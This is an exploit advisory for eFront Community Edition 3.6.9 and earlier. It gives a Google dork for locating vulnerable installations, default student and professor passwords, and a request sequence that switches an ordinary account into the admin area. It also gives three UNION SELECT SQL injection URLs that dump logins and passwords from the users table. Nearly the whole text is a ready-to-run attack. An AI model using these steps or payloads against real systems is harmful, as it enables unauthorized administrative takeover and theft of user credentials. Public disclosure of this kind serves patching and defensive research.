# Exploit Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities# Google Dork: "eFront (version 3.6.9)" inurl:index.php?ctg=*# Date: 5/09/2011# Public release: When 3.6.10 will be released# Author: IHTeam# Software Link: http://www.efrontlearning.net/download/download-efront.html# Tested on: efront_3.6.9_build11018# Original Advisory: http://iht.li/FWh# Advisory code: http://iht.li/p/0VV
Default username and password:
student:student
professor:professor
How to become admin:
Request 1:/change_account.php?login=admin
Request 2:/userpage.php
OR
simple use the [Switch account] option on top of the page;
Now you are in admin area;
SQL Injection:
www/student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
www/professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
www/admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
